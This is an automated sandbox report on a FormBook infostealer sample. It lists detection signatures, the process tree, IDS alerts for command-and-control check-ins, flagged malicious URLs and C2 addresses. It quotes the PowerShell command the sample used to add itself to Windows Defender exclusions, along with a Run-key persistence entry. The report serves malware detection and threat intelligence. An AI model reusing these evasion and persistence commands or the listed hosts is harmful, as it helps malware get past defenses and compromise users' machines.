Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nieuwebestellingen10122024.exe

Overview

General Information

Sample name:Nieuwebestellingen10122024.exe
Analysis ID:1572930
MD5:9a344f7aa0c680768aba67a0738dee2a
SHA1:f7d395145a4e8b164e505971dd27c5b201f41a09
SHA256:d8a46beafd4bd9945e59fbca9ad1801400b77173aa987651b8f434148bfd4d94
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Potential browser exploit detected (process start blacklist hit)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Nieuwebestellingen10122024.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" MD5: 9A344F7AA0C680768ABA67A0738DEE2A)
    • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1644 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • iexplore.exe (PID: 6752 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
      • tCyxXhRNgdPI.exe (PID: 6076 cmdline: "C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wscript.exe (PID: 6224 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
          • tCyxXhRNgdPI.exe (PID: 4352 cmdline: "C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7848 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • iexplore.exe (PID: 616 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • WerFault.exe (PID: 428 cmdline: C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • iexplore.exe (PID: 3752 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • iexplore.exe (PID: 5032 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
      • iexplore.exe (PID: 3788 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
        • ie_to_edge_stub.exe (PID: 6108 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c MD5: 89CF8972D683795DAB6901BC9456675D)
          • msedge.exe (PID: 2180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 3648 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7912 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5972 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7220 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=1272 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • ssvagent.exe (PID: 1400 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
      • iexplore.exe (PID: 3424 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17416 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
  • svchost.exe (PID: 3148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • iexplore.exe (PID: 8152 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • iexplore.exe (PID: 8188 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            5.2.iexplore.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.iexplore.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe", ParentImage: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe, ParentProcessId: 6096, ParentProcessName: Nieuwebestellingen10122024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, ProcessId: 2676, ProcessName: powershell.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Internet Explorer\iexplore.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6224, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LDSP2VC8
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe", ParentImage: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe, ParentProcessId: 6096, ParentProcessName: Nieuwebestellingen10122024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, ProcessId: 2676, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 3788, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 1400, ProcessName: ssvagent.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 5032, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe", ParentImage: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe, ParentProcessId: 6096, ParentProcessName: Nieuwebestellingen10122024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, ProcessId: 2676, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3148, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-11T09:40:02.370246+010028554651A Network Trojan was detected192.168.2.549769185.106.176.20480TCP
                2024-12-11T09:40:17.046952+010028554651A Network Trojan was detected192.168.2.5499533.33.130.19080TCP
                2024-12-11T09:40:40.345915+010028554651A Network Trojan was detected192.168.2.5500075.39.10.9380TCP
                2024-12-11T09:40:55.872136+010028554651A Network Trojan was detected192.168.2.550047194.58.112.17480TCP
                2024-12-11T09:41:11.129093+010028554651A Network Trojan was detected192.168.2.550087209.74.64.18780TCP
                2024-12-11T09:41:26.093993+010028554651A Network Trojan was detected192.168.2.5501063.33.130.19080TCP
                2024-12-11T09:41:40.819111+010028554651A Network Trojan was detected192.168.2.5501103.33.130.19080TCP
                2024-12-11T09:41:55.509551+010028554651A Network Trojan was detected192.168.2.5501143.33.130.19080TCP
                2024-12-11T09:42:31.499162+010028554651A Network Trojan was detected192.168.2.55011847.238.157.25380TCP
                2024-12-11T09:42:46.383856+010028554651A Network Trojan was detected192.168.2.55012367.223.117.16980TCP
                2024-12-11T09:43:01.879151+010028554651A Network Trojan was detected192.168.2.55012785.159.66.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-11T09:40:09.078114+010028554641A Network Trojan was detected192.168.2.5499273.33.130.19080TCP
                2024-12-11T09:40:11.732638+010028554641A Network Trojan was detected192.168.2.5499343.33.130.19080TCP
                2024-12-11T09:40:14.395620+010028554641A Network Trojan was detected192.168.2.5499443.33.130.19080TCP
                2024-12-11T09:40:32.322160+010028554641A Network Trojan was detected192.168.2.5499895.39.10.9380TCP
                2024-12-11T09:40:34.969331+010028554641A Network Trojan was detected192.168.2.5499955.39.10.9380TCP
                2024-12-11T09:40:37.656731+010028554641A Network Trojan was detected192.168.2.5500015.39.10.9380TCP
                2024-12-11T09:40:47.905990+010028554641A Network Trojan was detected192.168.2.550029194.58.112.17480TCP
                2024-12-11T09:40:50.569209+010028554641A Network Trojan was detected192.168.2.550035194.58.112.17480TCP
                2024-12-11T09:40:53.220446+010028554641A Network Trojan was detected192.168.2.550041194.58.112.17480TCP
                2024-12-11T09:41:02.790862+010028554641A Network Trojan was detected192.168.2.550069209.74.64.18780TCP
                2024-12-11T09:41:05.540813+010028554641A Network Trojan was detected192.168.2.550075209.74.64.18780TCP
                2024-12-11T09:41:08.517051+010028554641A Network Trojan was detected192.168.2.550081209.74.64.18780TCP
                2024-12-11T09:41:18.519515+010028554641A Network Trojan was detected192.168.2.5501033.33.130.19080TCP
                2024-12-11T09:41:20.761015+010028554641A Network Trojan was detected192.168.2.5501043.33.130.19080TCP
                2024-12-11T09:41:23.433677+010028554641A Network Trojan was detected192.168.2.5501053.33.130.19080TCP
                2024-12-11T09:41:32.878997+010028554641A Network Trojan was detected192.168.2.5501073.33.130.19080TCP
                2024-12-11T09:41:35.520320+010028554641A Network Trojan was detected192.168.2.5501083.33.130.19080TCP
                2024-12-11T09:41:38.169001+010028554641A Network Trojan was detected192.168.2.5501093.33.130.19080TCP
                2024-12-11T09:41:47.548276+010028554641A Network Trojan was detected192.168.2.5501113.33.130.19080TCP
                2024-12-11T09:41:50.205826+010028554641A Network Trojan was detected192.168.2.5501123.33.130.19080TCP
                2024-12-11T09:41:52.854926+010028554641A Network Trojan was detected192.168.2.5501133.33.130.19080TCP
                2024-12-11T09:42:03.153642+010028554641A Network Trojan was detected192.168.2.55011547.238.157.25380TCP
                2024-12-11T09:42:05.801684+010028554641A Network Trojan was detected192.168.2.55011647.238.157.25380TCP
                2024-12-11T09:42:08.461441+010028554641A Network Trojan was detected192.168.2.55011747.238.157.25380TCP
                2024-12-11T09:42:38.414739+010028554641A Network Trojan was detected192.168.2.55011967.223.117.16980TCP
                2024-12-11T09:42:41.071806+010028554641A Network Trojan was detected192.168.2.55012067.223.117.16980TCP
                2024-12-11T09:42:43.792953+010028554641A Network Trojan was detected192.168.2.55012267.223.117.16980TCP
                2024-12-11T09:42:54.097807+010028554641A Network Trojan was detected192.168.2.55012485.159.66.9380TCP
                2024-12-11T09:42:56.753295+010028554641A Network Trojan was detected192.168.2.55012585.159.66.9380TCP
                2024-12-11T09:42:59.395419+010028554641A Network Trojan was detected192.168.2.55012685.159.66.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-11T09:40:11.732638+010028563181A Network Trojan was detected192.168.2.5499343.33.130.19080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.restobarbebek.xyz/jm9b/Avira URL Cloud: Label: malware
                Source: https://deals.getxtra-pc.io/2QSW9DWJ/S2PR7B/?uid=146&sub1=enus5-1211Avira URL Cloud: Label: malware
                Source: https://www.whskysr.com/27MTDK4Q/GG1SRSH/?uid=43019&sub1=enus3-1211Avira URL Cloud: Label: malware
                Source: Nieuwebestellingen10122024.exeReversingLabs: Detection: 36%
                Source: Nieuwebestellingen10122024.exeVirustotal: Detection: 30%Perma Link
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Nieuwebestellingen10122024.exeJoe Sandbox ML: detected

                Exploits

                barindex
                Source: Yara matchFile source: 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Nieuwebestellingen10122024.exe PID: 6096, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.5:49832 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.5:49831 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49826 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49825 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49849 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49848 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.5:49879 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.5:49878 version: TLS 1.2
                Source: Nieuwebestellingen10122024.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: iexplore.pdbUGP source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: Microsoft.CSharp.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wscript.pdb source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wscript.pdbGCTL source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdbP/ source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tCyxXhRNgdPI.exe, 0000000B.00000000.2249922753.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499475516.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Dynamic.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: iexplore.pdb source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036C7A0 FindFirstFileW,FindNextFileW,FindClose,12_2_0036C7A0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then xor eax, eax12_2_00359F20
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then mov ebx, 00000004h12_2_047104CE
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 4x nop then xor eax, eax13_2_04BDB791
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49769 -> 185.106.176.204:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49953 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49934 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49934 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49927 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49944 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 5.39.10.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 5.39.10.93:80
